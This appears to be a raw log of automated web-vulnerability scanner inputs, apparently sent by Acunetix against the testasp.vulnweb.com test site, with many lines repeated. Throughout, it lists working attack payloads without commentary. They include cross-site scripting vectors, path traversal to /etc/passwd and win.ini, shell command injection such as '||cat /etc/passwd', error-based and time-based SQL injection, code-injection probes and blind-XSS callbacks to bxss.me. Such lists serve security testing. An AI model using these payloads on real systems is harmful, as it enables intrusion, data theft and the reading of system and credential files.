http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(918811)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&n950524=v912545

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(924828)"></g></svg>

MlAYYpwh'

1

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<img src=xyz OnErRor=prompt(979211)>

testasp.vulnweb.com

1<div style=width:expression(prompt(934850))>

lEdByRqz')

)

'

1

1

1

YozNusxq'))

1<iframe src='data:text/html

1

/etc/passwd

1<img/src=">" onerror=alert(971327)>

1

1

1

"

!(()&&!|*|*|

-1

1<body onload=prompt(956708)>

1<ScRiPt%20>prompt(919605)</sCripT>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985520)>

^(#$!@#$)(()))******

-1)

'

1

1

1&lt

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

&dir

'"()

1

-1))

1<img src=xyz OnErRor=prompt(955515)>

"

1

'&dir&'

1

\xf6<img acu onmouseover=prompt(923413) //\xf6>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1<img/src=">" onerror=alert(915046)>

5eEQD74b'

1

1

"&dir&"

1<input autofocus onfocus=prompt(955341)>

1

1

file:///etc/passwd

DsiJtfHP')

${@print(md5(acunetix_wvs_security_test))}\

1

1<ScRiPt%20>prompt(951126)</sCripT>

http://hitno4OV9NHbQ.bxss.me/

|dir

1

<a href='http://www.acunetix.com'>website security</a>

1

1

35quOFV1'))

1&lt

1

1

acunetix_wvs_invalid_filename

/\../\../\../\../\../\../\../etc/passwd

1

1

'|dir

[url=http://www.acunetix.com]website security[/url]

1

\xf6<img acu onmouseover=prompt(975806) //\xf6>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1'"

1

1

"|dir

1<input autofocus onfocus=prompt(905536)>

1_GQhOZ <ScRiPt >prompt(908808)</ScRiPt>

comments

WEB-INF/web.xml

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(53),CHAR(55),CHAR(101),CHAR(80),CHAR(72),CHAR(54),CHAR(111),CHAR(120)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

1

1

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

comments/.

http://www.acunetix.tst

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(53),CHAR(55),CHAR(101),CHAR(80),CHAR(72),CHAR(54),CHAR(111),CHAR(120)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

WEB-INF\web.xml

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

../../../../../../../../../../windows/win.ini

'"

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(53)+CHAR(55)+CHAR(101)+CHAR(80)+CHAR(72)+CHAR(54)+CHAR(111)+CHAR(120)) FROM syscolumns)

1

1

1

1_5LFpw <ScRiPt >prompt(919814)</ScRiPt>

1

1

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(53)+CHAR(55)+CHAR(101)+CHAR(80)+CHAR(72)+CHAR(54)+CHAR(111)+CHAR(120))

<!--

../../../../../../../../../../boot.ini

1

1

1

1

1

1'"()&%<ScRiPt >prompt(990161)</ScRiPt>

1

1

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(103),CHAR(110),CHAR(114),CHAR(110),CHAR(112),CHAR(66),CHAR(67)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

../../../../../../../../../../windows/win.ini.jpg

'"()&%<ScRiPt >prompt(965752)</ScRiPt>

1

1

1

1

1

1_951429

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(105),CHAR(103),CHAR(110),CHAR(114),CHAR(110),CHAR(112),CHAR(66),CHAR(67)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

1

1

1

1

1

response.write(9973794*9344565)

1

1

1

................windowswin.ini

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(103)+CHAR(110)+CHAR(114)+CHAR(110)+CHAR(112)+CHAR(66)+CHAR(67)) FROM syscolumns)+'

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(105)+CHAR(103)+CHAR(110)+CHAR(114)+CHAR(110)+CHAR(112)+CHAR(66)+CHAR(67))+'

1

'+response.write(9973794*9344565)+'

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(121),CHAR(100),CHAR(49),CHAR(104),CHAR(52),CHAR(102),CHAR(106),CHAR(49)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

..\..\..\..\..\..\..\..\windows\win.ini

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9973794*9344565)+"

1

'&cat /etc/passwd&'

1

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(121),CHAR(100),CHAR(49),CHAR(104),CHAR(52),CHAR(102),CHAR(106),CHAR(49)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(121)+CHAR(100)+CHAR(49)+CHAR(104)+CHAR(52)+CHAR(102)+CHAR(106)+CHAR(49)) FROM syscolumns)+"

acu3209\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3209

1

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(121)+CHAR(100)+CHAR(49)+CHAR(104)+CHAR(52)+CHAR(102)+CHAR(106)+CHAR(49))+"

1

1

cat /etc/passwd

1

acux7969\xc0\xbez1\xc0\xbcz2a\x90bcxuca7969

1

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<ScRiPt >prompt(901420)</ScRiPt>

../../../../../../../../../../etc/passwd

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

${99857+100039}

1

1

1<script>prompt(980878)</script>

|cat /etc/passwd#

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1<ScRiPt >prompt(991440)</ScRiPt>

1

1

1some_inexistent_file_with_long_name%00.jpg

1

1

WEB-INF/web.xml

../../../../../../../../../../etc/passwd.jpg

'|'ld

-1)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?990714></ScRiPt>

)

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1&n955381=v977230

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

"|"ld

WEB-INF\web.xml

1<ScRiPt >prompt(935813)</ScRiPt>

-1))

!(()&&!|*|*|

1

testasp.vulnweb.com

1

1

QxqrptTO'

1

^(#$!@#$)(()))******

1<video><source onerror="javascript:prompt(966579)">

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(909654)"></g></svg>

1

1

Z26VfTbS')

1

1

'"()

'

/../..//../..//../..//../..//../..//etc/passwd.jpg

'

1<div style=width:expression(prompt(978245))>

1

9CwvDpXa'))

1

1

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"

1<iframe src='data:text/html

"

-1

1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1<body onload=prompt(952037)>

/etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

1

http://hit8WnFX58ny6.bxss.me/

1

-1))

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985444)>

&dir

1

1

1'"

acunetix_wvs_invalid_filename

1

1

ZZvnk4F1'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<img src=xyz OnErRor=prompt(962488)>

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(82),CHAR(57),CHAR(111),CHAR(112),CHAR(55),CHAR(104),CHAR(84),CHAR(106)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

comments

http://www.acunetix.tst

gBIPAtqD')

1

"&dir&"

comments

1<img/src=">" onerror=alert(962918)>

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(82),CHAR(57),CHAR(111),CHAR(112),CHAR(55),CHAR(104),CHAR(84),CHAR(106)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

1

1

1

|dir

comments/.

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

J3G9iZVm'))

1<ScRiPt%20>prompt(931183)</sCripT>

1

1

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(82)+CHAR(57)+CHAR(111)+CHAR(112)+CHAR(55)+CHAR(104)+CHAR(84)+CHAR(106)) FROM syscolumns)

'"

1&lt

1

'|dir

1

1

1

<!--

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(82)+CHAR(57)+CHAR(111)+CHAR(112)+CHAR(55)+CHAR(104)+CHAR(84)+CHAR(106))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

\xf6<img acu onmouseover=prompt(911691) //\xf6>

1

1'"()&%<ScRiPt >prompt(983468)</ScRiPt>

"|dir

1

response.write(9781478*9758124)

1<input autofocus onfocus=prompt(918497)>

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(106),CHAR(49),CHAR(110),CHAR(70),CHAR(87),CHAR(80),CHAR(119),CHAR(121)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

1

1

'"()&%<ScRiPt >prompt(974269)</ScRiPt>

1

'+response.write(9781478*9758124)+'

'(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(106),CHAR(49),CHAR(110),CHAR(70),CHAR(87),CHAR(80),CHAR(119),CHAR(121)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))'

1

<a href='http://www.acunetix.com'>website security</a>

1

"+response.write(9781478*9758124)+"

1_934089

file:///etc/passwd

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

'+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(106)+CHAR(49)+CHAR(110)+CHAR(70)+CHAR(87)+CHAR(80)+CHAR(119)+CHAR(121)) FROM syscolumns)+'

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

'+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(106)+CHAR(49)+CHAR(110)+CHAR(70)+CHAR(87)+CHAR(80)+CHAR(119)+CHAR(121))+'

1_eiaIQ <ScRiPt >prompt(971845)</ScRiPt>

1

&cat /etc/passwd&

1

"and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(49),CHAR(71),CHAR(103),CHAR(118),CHAR(88),CHAR(99),CHAR(50)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and"

WEB-INF/web.xml

1

1

1

1

"(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(81),CHAR(49),CHAR(71),CHAR(103),CHAR(118),CHAR(88),CHAR(99),CHAR(50)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))"

'&cat /etc/passwd&'

1

1

WEB-INF\web.xml

SomeCustomInjectedHeader:injected_by_wvs

1

"+(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(81)+CHAR(49)+CHAR(71)+CHAR(103)+CHAR(118)+CHAR(88)+CHAR(99)+CHAR(50)) FROM syscolumns)+"

acu6986\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6986

1

../../../../../../../../../../windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

"+convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(81)+CHAR(49)+CHAR(71)+CHAR(103)+CHAR(118)+CHAR(88)+CHAR(99)+CHAR(50))+"

acux4741\xc0\xbez1\xc0\xbcz2a\x90bcxuca4741

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../boot.ini

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd

1

1<ScRiPt >prompt(911557)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

`cat /etc/passwd`

1<script>prompt(994236)</script>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(9.375),0)/*'XOR(if(now()=sysdate(),sleep(9.375),0))OR'"XOR(if(now()=sysdate(),sleep(9.375),0))OR"*/

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

|cat /etc/passwd#

1<ScRiPt >prompt(939417)</ScRiPt>

1

1

../../../../../../../../../../etc/passwd.jpg

1

(select(0)from(select(sleep(3.125)))v)/*'+(select(0)from(select(sleep(3.125)))v)+'"+(select(0)from(select(sleep(3.125)))v)+"*/

'|'ld

................windowswin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?993923></ScRiPt>

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

"|"ld

1<ScRiPt >prompt(968950)</ScRiPt>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1

1<video><source onerror="javascript:prompt(987602)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

${100477+99798}

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(972731)"></g></svg>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'

1

1

1<div style=width:expression(prompt(976400))>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

fvkrn6cc'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1&n921504=v932620

1

1some_inexistent_file_with_long_name%00.jpg

/etc/passwd

3Z2xKz6d')

1

"

1

1<iframe src='data:text/html

UxCrLSP9'))

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

||cat /etc/passwd

1<body onload=prompt(919946)>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

)

testasp.vulnweb.com

WEB-INF/web.xml

1

-1)

!(()&&!|*|*|

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

&dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(991576)>

1

^(#$!@#$)(()))******

1

-1))

1

WEB-INF\web.xml

1

'&dir&'

1

1<img src=xyz OnErRor=prompt(922235)>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

l4A5Ebj4'

1

1

"&dir&"

1<img/src=">" onerror=alert(938225)>

1

1

'"()

1LyYjGj2')

1

1

1

1

1<ScRiPt%20>prompt(990438)</sCripT>

file:///etc/passwd

|dir

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

3ZZPbw9v'))

1

1

'

'|dir

/\../\../\../\../\../\../\../etc/passwd

1

1&lt

1

http://hitv0oFhLgIlJ.bxss.me/

"

acunetix_wvs_invalid_filename

1

1

1

\xf6<img acu onmouseover=prompt(988472) //\xf6>

WEB-INF/web.xml

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

"|dir

1

comments

1

${@print(md5(acunetix_wvs_security_test))}

http://www.acunetix.tst

WEB-INF\web.xml

1

1

1<input autofocus onfocus=prompt(928720)>

1

'"

${@print(md5(acunetix_wvs_security_test))}\

comments

1

1'"()&%<ScRiPt >prompt(931600)</ScRiPt>

../../../../../../../../../../windows/win.ini

1

<a href='http://www.acunetix.com'>website security</a>

1

1

<!--

1

../../../../../../../../../../boot.ini

comments/.

'"()&%<ScRiPt >prompt(908095)</ScRiPt>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1_981743

../../../../../../../../../../windows/win.ini.jpg

1

1_ZKbgp <ScRiPt >prompt(965631)</ScRiPt>

1

1

1

1

response.write(9209164*9369151)

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

1

'+response.write(9209164*9369151)+'

1

................windowswin.ini

1

1

1

1

"+response.write(9209164*9369151)+"

1

1

..\..\..\..\..\..\..\..\windows\win.ini

&cat /etc/passwd&

1

1

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

acu8383\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8383

1

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

acux5466\xc0\xbez1\xc0\xbcz2a\x90bcxuca5466

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

1

1

1<ScRiPt >prompt(937323)</ScRiPt>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

${99536+99563}

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

1<script>prompt(920232)</script>

1

1

../../../../../../../../../../etc/passwd.jpg

`cat /etc/passwd`

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<ScRiPt >prompt(981078)</ScRiPt>

|cat /etc/passwd#

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

WEB-INF/web.xml

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?900843></ScRiPt>

1

-1

1

1&n932106=v919288

WEB-INF\web.xml

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

1<ScRiPt >prompt(975222)</ScRiPt>

1

1

1

-1)

testasp.vulnweb.com

"|"ld

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<video><source onerror="javascript:prompt(958847)">

)

1

1

1

1

-1))

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(962802)"></g></svg>

1

BQloMIgA'

'"()

1

1

1

mAX7fwSK')

/etc/passwd

1<div style=width:expression(prompt(936971))>

^(#$!@#$)(()))******

'

1

1

1

1

1

kt3c3RiE'))

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1<iframe src='data:text/html

-1

1

1

1

1

1<body onload=prompt(978196)>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

||cat /etc/passwd

-1)

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

&dir

-1))

'

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969254)>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

1

1

1

1

1<img src=xyz OnErRor=prompt(960180)>

1

uPHe0sFC'

"

1

1

"&dir&"

http://hite9Mr11HLFw.bxss.me/

${@print(md5(acunetix_wvs_security_test))}

CC8UaUMA')

acunetix_wvs_invalid_filename

1<img/src=">" onerror=alert(951669)>

1

${@print(md5(acunetix_wvs_security_test))}\

1

file:///etc/passwd

1'"

P52PICmF'))

|dir

1

1

comments

1<ScRiPt%20>prompt(903133)</sCripT>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

1

1

1

\

1

'|dir

comments

1

1

WEB-INF/web.xml

1\xc0xa7\xc0\xa2

http://www.acunetix.tst

1

1&lt

comments/.

1

@@GSS1G

"|dir

1

WEB-INF\web.xml

1

\xf6<img acu onmouseover=prompt(937339) //\xf6>

1

1

'"

JyI=

../../../../../../../../../../windows/win.ini

1<input autofocus onfocus=prompt(978085)>

1

1

1

1

<!--

1

1'"()&%<ScRiPt >prompt(929667)</ScRiPt>

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

../../../../../../../../../../boot.ini

1

1

'"()&%<ScRiPt >prompt(985082)</ScRiPt>

1

1

[url=http://www.acunetix.com]website security[/url]

1

1_937893

response.write(9244027*9655838)

../../../../../../../../../../windows/win.ini.jpg

&cat /etc/passwd&

1

1

1

1

'+response.write(9244027*9655838)+'

1_aaBIm <ScRiPt >prompt(998529)</ScRiPt>

1

"+response.write(9244027*9655838)+"

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

................windowswin.ini

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

1

../../../../../../../../../../etc/passwd

acu8836\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8836

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

|cat /etc/passwd#

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

acux3690\xc0\xbez1\xc0\xbcz2a\x90bcxuca3690

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

../../../../../../../../../../etc/passwd.jpg

${99153+100320}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

'|'ld

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1<ScRiPt >prompt(950684)</ScRiPt>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1<script>prompt(933434)</script>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

-1

1some_inexistent_file_with_long_name%00.jpg

1&n922004=v974296

1<ScRiPt >prompt(929299)</ScRiPt>

1

)

"|"ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1)

1

1

!(()&&!|*|*|

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976290></ScRiPt>

1

testasp.vulnweb.com

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

^(#$!@#$)(()))******

1

1<ScRiPt >prompt(959183)</ScRiPt>

1

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(914706)">

YsHuDdhV'

1

'

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

WEB-INF\web.xml

WLWYmk37')

1

1

1

'"()

"

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(992517)"></g></svg>

1

1

1

HvFPoGxL'))

1

/etc/passwd

1

1

||cat /etc/passwd

1

1<div style=width:expression(prompt(976495))>

-1

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<iframe src='data:text/html

-1)

&dir

"

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

http://hit7DdIbGLME0.bxss.me/

'&dir&'

${@print(md5(acunetix_wvs_security_test))}

-1))

1<body onload=prompt(987972)>

acunetix_wvs_invalid_filename

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921261)>

"&dir&"

${@print(md5(acunetix_wvs_security_test))}\

1

JCLQdibN'

1

1

comments

1

1<img src=xyz OnErRor=prompt(927808)>

|dir

CULdPIGf')

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1'"

1

file:///etc/passwd

1<img/src=">" onerror=alert(990573)>

comments

1

1

'|dir

and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(71),CHAR(100),CHAR(65),CHAR(116),CHAR(76),CHAR(55),CHAR(68),CHAR(100)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and

HZbNJBmp'))

1

1<ScRiPt%20>prompt(990445)</sCripT>

1

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

comments/.

1&lt

'"

(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(71),CHAR(100),CHAR(65),CHAR(116),CHAR(76),CHAR(55),CHAR(68),CHAR(100)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

1

1

"|dir

WEB-INF/web.xml

\xf6<img acu onmouseover=prompt(938154) //\xf6>

1

1

<!--

(select convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(71)+CHAR(100)+CHAR(65)+CHAR(116)+CHAR(76)+CHAR(55)+CHAR(68)+CHAR(100)) FROM syscolumns)

1

1

WEB-INF\web.xml

convert(int,CHAR(52)+CHAR(67)+CHAR(117)+CHAR(71)+CHAR(100)+CHAR(65)+CHAR(116)+CHAR(76)+CHAR(55)+CHAR(68)+CHAR(100))

1

1<input autofocus onfocus=prompt(901759)>

1

1

'and(select 1 from(select count(*),concat((select concat(CHAR(52),CHAR(67),CHAR(117),CHAR(80),CHAR(116),CHAR(119),CHAR(87),CHAR(53),CHAR(57),CHAR(72),CHAR(65)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

<a href='http://www.acunetix.com'>website security</a>

